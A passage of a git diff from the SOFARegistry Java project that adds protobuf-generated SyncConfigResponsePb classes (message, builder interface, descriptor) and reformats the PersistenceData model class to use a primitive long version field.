except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code SyncConfigResponsePb} */ +public final class SyncConfigResponsePb extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:SyncConfigResponsePb) + SyncConfigResponsePbOrBuilder { + private static final long serialVersionUID = 0L; + // Use SyncConfigResponsePb.newBuilder() to construct. + private SyncConfigResponsePb(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private SyncConfigResponsePb() { + availableSegments_ = com.google.protobuf.LazyStringArrayList.EMPTY; + retryInterval_ = 0; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private SyncConfigResponsePb( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 10: + { + com.alipay.sofa.registry.common.model.client.pb.ResultPb.Builder subBuilder = null; + if (result_ != null) { + subBuilder = result_.toBuilder(); + } + result_ = + input.readMessage( + com.alipay.sofa.registry.common.model.client.pb.ResultPb.parser(), + extensionRegistry); + if (subBuilder != null) { + subBuilder.mergeFrom(result_); + result_ = subBuilder.buildPartial(); + } + + break; + } + case 18: + { + java.lang.String s = input.readStringRequireUtf8(); + if (!((mutable_bitField0_ & 0x00000002) == 0x00000002)) { + availableSegments_ = new com.google.protobuf.LazyStringArrayList(); + mutable_bitField0_ |= 0x00000002; + } + availableSegments_.add(s); + break; + } + case 24: + { + retryInterval_ = input.readInt32(); + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + if (((mutable_bitField0_ & 0x00000002) == 0x00000002)) { + availableSegments_ = availableSegments_.getUnmodifiableView(); + } + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePbOuterClass + .internal_static_SyncConfigResponsePb_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePbOuterClass + .internal_static_SyncConfigResponsePb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb.class, + com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb.Builder.class); + } + + private int bitField0_; + public static final int RESULT_FIELD_NUMBER = 1; + private com.alipay.sofa.registry.common.model.client.pb.ResultPb result_; + /** .ResultPb result = 1; */ + public boolean hasResult() { + return result_ != null; + } + /** .ResultPb result = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.ResultPb getResult() { + return result_ == null + ? com.alipay.sofa.registry.common.model.client.pb.ResultPb.getDefaultInstance() + : result_; + } + /** .ResultPb result = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.ResultPbOrBuilder getResultOrBuilder() { + return getResult(); + } + + public static final int AVAILABLESEGMENTS_FIELD_NUMBER = 2; + private com.google.protobuf.LazyStringList availableSegments_; + /** repeated string availableSegments = 2; */ + public com.google.protobuf.ProtocolStringList getAvailableSegmentsList() { + return availableSegments_; + } + /** repeated string availableSegments = 2; */ + public int getAvailableSegmentsCount() { + return availableSegments_.size(); + } + /** repeated string availableSegments = 2; */ + public java.lang.String getAvailableSegments(int index) { + return availableSegments_.get(index); + } + /** repeated string availableSegments = 2; */ + public com.google.protobuf.ByteString getAvailableSegmentsBytes(int index) { + return availableSegments_.getByteString(index); + } + + public static final int RETRYINTERVAL_FIELD_NUMBER = 3; + private int retryInterval_; + /** int32 retryInterval = 3; */ + public int getRetryInterval() { + return retryInterval_; + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + if (result_ != null) { + output.writeMessage(1, getResult()); + } + for (int i = 0; i < availableSegments_.size(); i++) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 2, availableSegments_.getRaw(i)); + } + if (retryInterval_ != 0) { + output.writeInt32(3, retryInterval_); + } + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + if (result_ != null) { + size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, getResult()); + } + { + int dataSize = 0; + for (int i = 0; i < availableSegments_.size(); i++) { + dataSize += computeStringSizeNoTag(availableSegments_.getRaw(i)); + } + size += dataSize; + size += 1 * getAvailableSegmentsList().size(); + } + if (retryInterval_ != 0) { + size += com.google.protobuf.CodedOutputStream.computeInt32Size(3, retryInterval_); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb other = + (com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb) obj; + + boolean result = true; + result = result && (hasResult() == other.hasResult()); + if (hasResult()) { + result = result && getResult().equals(other.getResult()); + } + result = result && getAvailableSegmentsList().equals(other.getAvailableSegmentsList()); + result = result && (getRetryInterval() == other.getRetryInterval()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + if (hasResult()) { + hash = (37 * hash) + RESULT_FIELD_NUMBER; + hash = (53 * hash) + getResult().hashCode(); + } + if (getAvailableSegmentsCount() > 0) { + hash = (37 * hash) + AVAILABLESEGMENTS_FIELD_NUMBER; + hash = (53 * hash) + getAvailableSegmentsList().hashCode(); + } + hash = (37 * hash) + RETRYINTERVAL_FIELD_NUMBER; + hash = (53 * hash) + getRetryInterval(); + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb parseFrom( + byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb + parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb + parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code SyncConfigResponsePb} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:SyncConfigResponsePb) + com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePbOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePbOuterClass + .internal_static_SyncConfigResponsePb_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePbOuterClass + .internal_static_SyncConfigResponsePb_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb.class, + com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb.Builder.class); + } + + // Construct using + // com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + if (resultBuilder_ == null) { + result_ = null; + } else { + result_ = null; + resultBuilder_ = null; + } + availableSegments_ = com.google.protobuf.LazyStringArrayList.EMPTY; + bitField0_ = (bitField0_ & ~0x00000002); + retryInterval_ = 0; + + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePbOuterClass + .internal_static_SyncConfigResponsePb_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb + getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb + .getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb build() { + com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb result = + new com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb(this); + int from_bitField0_ = bitField0_; + int to_bitField0_ = 0; + if (resultBuilder_ == null) { + result.result_ = result_; + } else { + result.result_ = resultBuilder_.build(); + } + if (((bitField0_ & 0x00000002) == 0x00000002)) { + availableSegments_ = availableSegments_.getUnmodifiableView(); + bitField0_ = (bitField0_ & ~0x00000002); + } + result.availableSegments_ = availableSegments_; + result.retryInterval_ = retryInterval_; + result.bitField0_ = to_bitField0_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb) { + return mergeFrom( + (com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom( + com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb other) { + if (other + == com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb + .getDefaultInstance()) return this; + if (other.hasResult()) { + mergeResult(other.getResult()); + } + if (!other.availableSegments_.isEmpty()) { + if (availableSegments_.isEmpty()) { + availableSegments_ = other.availableSegments_; + bitField0_ = (bitField0_ & ~0x00000002); + } else { + ensureAvailableSegmentsIsMutable(); + availableSegments_.addAll(other.availableSegments_); + } + onChanged(); + } + if (other.getRetryInterval() != 0) { + setRetryInterval(other.getRetryInterval()); + } + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb) + e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private int bitField0_; + + private com.alipay.sofa.registry.common.model.client.pb.ResultPb result_ = null; + private com.google.protobuf.SingleFieldBuilderV3< + com.alipay.sofa.registry.common.model.client.pb.ResultPb, + com.alipay.sofa.registry.common.model.client.pb.ResultPb.Builder, + com.alipay.sofa.registry.common.model.client.pb.ResultPbOrBuilder> + resultBuilder_; + /** .ResultPb result = 1; */ + public boolean hasResult() { + return resultBuilder_ != null || result_ != null; + } + /** .ResultPb result = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.ResultPb getResult() { + if (resultBuilder_ == null) { + return result_ == null + ? com.alipay.sofa.registry.common.model.client.pb.ResultPb.getDefaultInstance() + : result_; + } else { + return resultBuilder_.getMessage(); + } + } + /** .ResultPb result = 1; */ + public Builder setResult(com.alipay.sofa.registry.common.model.client.pb.ResultPb value) { + if (resultBuilder_ == null) { + if (value == null) { + throw new NullPointerException(); + } + result_ = value; + onChanged(); + } else { + resultBuilder_.setMessage(value); + } + + return this; + } + /** .ResultPb result = 1; */ + public Builder setResult( + com.alipay.sofa.registry.common.model.client.pb.ResultPb.Builder builderForValue) { + if (resultBuilder_ == null) { + result_ = builderForValue.build(); + onChanged(); + } else { + resultBuilder_.setMessage(builderForValue.build()); + } + + return this; + } + /** .ResultPb result = 1; */ + public Builder mergeResult(com.alipay.sofa.registry.common.model.client.pb.ResultPb value) { + if (resultBuilder_ == null) { + if (result_ != null) { + result_ = + com.alipay.sofa.registry.common.model.client.pb.ResultPb.newBuilder(result_) + .mergeFrom(value) + .buildPartial(); + } else { + result_ = value; + } + onChanged(); + } else { + resultBuilder_.mergeFrom(value); + } + + return this; + } + /** .ResultPb result = 1; */ + public Builder clearResult() { + if (resultBuilder_ == null) { + result_ = null; + onChanged(); + } else { + result_ = null; + resultBuilder_ = null; + } + + return this; + } + /** .ResultPb result = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.ResultPb.Builder getResultBuilder() { + + onChanged(); + return getResultFieldBuilder().getBuilder(); + } + /** .ResultPb result = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.ResultPbOrBuilder getResultOrBuilder() { + if (resultBuilder_ != null) { + return resultBuilder_.getMessageOrBuilder(); + } else { + return result_ == null + ? com.alipay.sofa.registry.common.model.client.pb.ResultPb.getDefaultInstance() + : result_; + } + } + /** .ResultPb result = 1; */ + private com.google.protobuf.SingleFieldBuilderV3< + com.alipay.sofa.registry.common.model.client.pb.ResultPb, + com.alipay.sofa.registry.common.model.client.pb.ResultPb.Builder, + com.alipay.sofa.registry.common.model.client.pb.ResultPbOrBuilder> + getResultFieldBuilder() { + if (resultBuilder_ == null) { + resultBuilder_ = + new com.google.protobuf.SingleFieldBuilderV3< + com.alipay.sofa.registry.common.model.client.pb.ResultPb, + com.alipay.sofa.registry.common.model.client.pb.ResultPb.Builder, + com.alipay.sofa.registry.common.model.client.pb.ResultPbOrBuilder>( + getResult(), getParentForChildren(), isClean()); + result_ = null; + } + return resultBuilder_; + } + + private com.google.protobuf.LazyStringList availableSegments_ = + com.google.protobuf.LazyStringArrayList.EMPTY; + + private void ensureAvailableSegmentsIsMutable() { + if (!((bitField0_ & 0x00000002) == 0x00000002)) { + availableSegments_ = new com.google.protobuf.LazyStringArrayList(availableSegments_); + bitField0_ |= 0x00000002; + } + } + /** repeated string availableSegments = 2; */ + public com.google.protobuf.ProtocolStringList getAvailableSegmentsList() { + return availableSegments_.getUnmodifiableView(); + } + /** repeated string availableSegments = 2; */ + public int getAvailableSegmentsCount() { + return availableSegments_.size(); + } + /** repeated string availableSegments = 2; */ + public java.lang.String getAvailableSegments(int index) { + return availableSegments_.get(index); + } + /** repeated string availableSegments = 2; */ + public com.google.protobuf.ByteString getAvailableSegmentsBytes(int index) { + return availableSegments_.getByteString(index); + } + /** repeated string availableSegments = 2; */ + public Builder setAvailableSegments(int index, java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + ensureAvailableSegmentsIsMutable(); + availableSegments_.set(index, value); + onChanged(); + return this; + } + /** repeated string availableSegments = 2; */ + public Builder addAvailableSegments(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + ensureAvailableSegmentsIsMutable(); + availableSegments_.add(value); + onChanged(); + return this; + } + /** repeated string availableSegments = 2; */ + public Builder addAllAvailableSegments(java.lang.Iterable values) { + ensureAvailableSegmentsIsMutable(); + com.google.protobuf.AbstractMessageLite.Builder.addAll(values, availableSegments_); + onChanged(); + return this; + } + /** repeated string availableSegments = 2; */ + public Builder clearAvailableSegments() { + availableSegments_ = com.google.protobuf.LazyStringArrayList.EMPTY; + bitField0_ = (bitField0_ & ~0x00000002); + onChanged(); + return this; + } + /** repeated string availableSegments = 2; */ + public Builder addAvailableSegmentsBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + ensureAvailableSegmentsIsMutable(); + availableSegments_.add(value); + onChanged(); + return this; + } + + private int retryInterval_; + /** int32 retryInterval = 3; */ + public int getRetryInterval() { + return retryInterval_; + } + /** int32 retryInterval = 3; */ + public Builder setRetryInterval(int value) { + + retryInterval_ = value; + onChanged(); + return this; + } + /** int32 retryInterval = 3; */ + public Builder clearRetryInterval() { + + retryInterval_ = 0; + onChanged(); + return this; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:SyncConfigResponsePb) + } + + // @@protoc_insertion_point(class_scope:SyncConfigResponsePb) + private static final com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb + DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb + getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public SyncConfigResponsePb parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new SyncConfigResponsePb(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.SyncConfigResponsePb + getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SyncConfigResponsePbOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SyncConfigResponsePbOrBuilder.java new file mode 100644 index 000000000..c9dd44713 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SyncConfigResponsePbOrBuilder.java @@ -0,0 +1,42 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface SyncConfigResponsePbOrBuilder + extends + // @@protoc_insertion_point(interface_extends:SyncConfigResponsePb) + com.google.protobuf.MessageOrBuilder { + + /** .ResultPb result = 1; */ + boolean hasResult(); + /** .ResultPb result = 1; */ + com.alipay.sofa.registry.common.model.client.pb.ResultPb getResult(); + /** .ResultPb result = 1; */ + com.alipay.sofa.registry.common.model.client.pb.ResultPbOrBuilder getResultOrBuilder(); + + /** repeated string availableSegments = 2; */ + java.util.List getAvailableSegmentsList(); + /** repeated string availableSegments = 2; */ + int getAvailableSegmentsCount(); + /** repeated string availableSegments = 2; */ + java.lang.String getAvailableSegments(int index); + /** repeated string availableSegments = 2; */ + com.google.protobuf.ByteString getAvailableSegmentsBytes(int index); + + /** int32 retryInterval = 3; */ + int getRetryInterval(); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SyncConfigResponsePbOuterClass.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SyncConfigResponsePbOuterClass.java new file mode 100644 index 000000000..83b8422de --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/SyncConfigResponsePbOuterClass.java @@ -0,0 +1,73 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public final class SyncConfigResponsePbOuterClass { + private SyncConfigResponsePbOuterClass() {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistryLite registry) {} + + public static void registerAllExtensions(com.google.protobuf.ExtensionRegistry registry) { + registerAllExtensions((com.google.protobuf.ExtensionRegistryLite) registry); + } + + static final com.google.protobuf.Descriptors.Descriptor + internal_static_SyncConfigResponsePb_descriptor; + static final com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internal_static_SyncConfigResponsePb_fieldAccessorTable; + + public static com.google.protobuf.Descriptors.FileDescriptor getDescriptor() { + return descriptor; + } + + private static com.google.protobuf.Descriptors.FileDescriptor descriptor; + + static { + java.lang.String[] descriptorData = { + "\n\032SyncConfigResponsePb.proto\032\016ResultPb.p" + + "roto\"c\n\024SyncConfigResponsePb\022\031\n\006result\030\001" + + " \001(\0132\t.ResultPb\022\031\n\021availableSegments\030\002 \003" + + "(\t\022\025\n\rretryInterval\030\003 \001(\005B7\n/com.alipay." + + "sofa.registry.common.model.client.pbP\001Z\002" + + "pbb\006proto3" + }; + com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner assigner = + new com.google.protobuf.Descriptors.FileDescriptor.InternalDescriptorAssigner() { + public com.google.protobuf.ExtensionRegistry assignDescriptors( + com.google.protobuf.Descriptors.FileDescriptor root) { + descriptor = root; + return null; + } + }; + com.google.protobuf.Descriptors.FileDescriptor.internalBuildGeneratedFileFrom( + descriptorData, + new com.google.protobuf.Descriptors.FileDescriptor[] { + com.alipay.sofa.registry.common.model.client.pb.ResultPbOuterClass.getDescriptor(), + }, + assigner); + internal_static_SyncConfigResponsePb_descriptor = getDescriptor().getMessageTypes().get(0); + internal_static_SyncConfigResponsePb_fieldAccessorTable = + new com.google.protobuf.GeneratedMessageV3.FieldAccessorTable( + internal_static_SyncConfigResponsePb_descriptor, + new java.lang.String[] { + "Result", "AvailableSegments", "RetryInterval", + }); + com.alipay.sofa.registry.common.model.client.pb.ResultPbOuterClass.getDescriptor(); + } + + // @@protoc_insertion_point(outer_class_scope) +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/console/PersistenceData.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/console/PersistenceData.java index 75ae50f11..2cb56d7fd 100644 --- a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/console/PersistenceData.java +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/console/PersistenceData.java @@ -17,118 +17,148 @@ package com.alipay.sofa.registry.common.model.console; import java.io.Serializable; +import java.util.Objects; /** - * * @author shangyu.wh * @version $Id: PersistenceData.java, v 0.1 2018-04-18 11:20 shangyu.wh Exp $ */ public class PersistenceData implements Serializable { - private String dataId; - - private String group; - - private String instanceId; - - private Long version; - - private String data; - - /** - * Getter method for property version. - * - * @return property value of version - */ - public Long getVersion() { - return version; - } - - /** - * Setter method for property version. - * - * @param version value to be assigned to property version - */ - public void setVersion(Long version) { - this.version = version; - } - - /** - * Getter method for property data. - * - * @return property value of data - */ - public String getData() { - return data; - } - - /** - * Setter method for property data. - * - * @param data value to be assigned to property data - */ - public void setData(String data) { - this.data = data; - } - - /** - * Getter method for property dataId. - * - * @return property value of dataId - */ - public String getDataId() { - return dataId; - } - - /** - * Setter method for property dataId. - * - * @param dataId value to be assigned to property dataId - */ - public void setDataId(String dataId) { - this.dataId = dataId; - } - - /** - * Getter method for property group. - * - * @return property value of group - */ - public String getGroup() { - return group; - } - - /** - * Setter method for property group. - * - * @param group value to be assigned to property group - */ - public void setGroup(String group) { - this.group = group; - } - - /** - * Getter method for property instanceId. - * - * @return property value of instanceId - */ - public String getInstanceId() { - return instanceId; - } - - /** - * Setter method for property instanceId. - * - * @param instanceId value to be assigned to property instanceId - */ - public void setInstanceId(String instanceId) { - this.instanceId = instanceId; - } - - @Override - public String toString() { - return "PersistenceData{" + "dataId='" + dataId + '\'' + ", group='" + group + '\'' - + ", instanceId='" + instanceId + '\'' + ", version=" + version + ", data='" + data - + '\'' + '}'; - } -} \ No newline at end of file + private String dataId; + + private String group; + + private String instanceId; + + private long version; + + private String data; + + /** + * Getter method for property version. + * + * @return property value of version + */ + public long getVersion() { + return version; + } + + /** + * Setter method for property version. + * + * @param version value to be assigned to property version + */ + public void setVersion(long version) { + this.version = version; + } + + /** + * Getter method for property data. + * + * @return property value of data + */ + public String getData() { + return data; + } + + /** + * Setter method for property data. + * + * @param data value to be assigned to property data + */ + public void setData(String data) { + this.data = data; + } + + /** + * Getter method for property dataId. + * + * @return property value of dataId + */ + public String getDataId() { + return dataId; + } + 